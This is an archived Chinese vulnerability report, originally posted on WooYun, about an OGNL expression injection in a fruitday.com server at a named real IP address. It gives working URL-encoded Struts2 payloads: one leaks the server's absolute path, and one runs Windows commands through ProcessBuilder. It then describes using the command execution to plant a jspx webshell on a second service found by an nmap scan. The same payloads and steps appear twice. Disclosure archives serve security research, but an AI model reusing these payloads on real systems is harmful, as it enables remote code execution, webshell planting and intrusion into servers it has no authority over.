CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

天天果园某平台表达式注入(已Getshell)

2016年11月2日 2961点热度 0人点赞 0条评论

缺陷编号: WooYun-2016-219335

漏洞标题: 天天果园某平台表达式注入(已Getshell)

相关厂商: fruitday.com

漏洞作者: A1opex

提交时间: 2016-06-15 06:49

公开时间: 2016-06-20 07:40

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 表达式注入

18人收藏 收藏

分享漏洞:

0

漏洞详情

披露状态:

2016-06-15: 细节已通知厂商并且等待厂商处理中
2016-06-15: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

"Some of us don't get to grow old with the one we love."
— "I'll go old with her, Mr. Reese, just from afar."

某天,阳光明媚,乌云密布,睡了个午觉,梦见某ip存在表达式注入,醒来打开电脑,凭借零散的记忆,然后就Getshell了

详细说明:

http://180.167.72.216:89

fruitday6.png

发现了一个表达式注入

fruitday5.png

payload

code 区域
%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

爆出绝对路径

尝试写shell

然而failed,访问其他页面都需要登录

想啊想,不能就这样放弃了呀

nmap扫一下,发现88端口还有一个web服务

fruitday2.png

巧的是

如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的

于是在89端口的表达式注入那里

code 区域
%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D

找到了88端口的这个web服务的物理路径

写shell

直接jsp肯定是不行的,然而jspx

fruitday4.png

fruitday1.png

总的来说就是从A服务的命令执行写shell到B服务进行访问的故事

漏洞证明:

http://180.167.72.216:89

fruitday6.png

发现了一个表达式注入

fruitday5.png

payload

code 区域
%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

爆出绝对路径

尝试写shell

然而failed,访问其他页面都需要登录

想啊想,不能就这样放弃了呀

nmap扫一下,发现88端口还有一个web服务

fruitday2.png

巧的是

如果关闭了弹窗的话会被重定向到一个帮助文件,这个是不需要登录的

于是在89端口的表达式注入那里

code 区域
%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'cmd','/c','dir e:\*.jsp /s'%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23matt.getWriter().println('~'%2B'~~2')%2C%23matt.getWriter().println(%23e)%2C%23matt.getWriter().println('2~'%2B'~~')%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%7D

找到了88端口的这个web服务的物理路径

写shell

直接jsp肯定是不行的,然而jspx

fruitday4.png

fruitday1.png

总的来说就是从A服务的命令执行写shell到B服务进行访问的故事

修复方案:

你懂的比我多呐>3<

版权声明:转载请注明来源 A1opex@乌云

0day

标签: 暂无
最后更新:2016年11月2日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me